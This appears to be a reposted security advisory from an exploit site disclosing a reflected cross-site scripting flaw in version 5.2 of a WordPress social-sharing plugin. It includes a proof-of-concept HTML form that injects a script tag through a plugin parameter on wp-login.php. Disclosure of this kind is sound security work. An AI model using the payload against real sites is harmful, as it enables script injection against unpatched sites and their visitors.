WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting Vulnerability

Full Baslik	WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting Vulnerability
Eklenme Tarihi	04-08-2015
Kategori	web applications
Platform	php
Risk	Security Risk Low

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

Title: WordPress '1-click Retweet/Share/Like' Plugin Version: 5.2 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-21 Download: - https://wordpress.org/plugins/1-click-retweetsharelike/ - https://plugins.svn.wordpress.org/1-click-retweetsharelike/ Notified Vendor/WordPress: 2015-06-21 ==========================================================   ## Plugin description ========================================================== Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ   ## Vulnerabilities ========================================================== The plugin is vulnerable to reflected XSS.   PoC: Submit the following request (no need to login first..) <form method="POST" action="[URL]/wp-login.php"> <input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br /> <input type="submit"> </form>     ## Solution ========================================================== No fix available   ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.   # 0day.today [2015-08-04] # fb.com/inj3ct0rs and twitter.com/inj3ct0r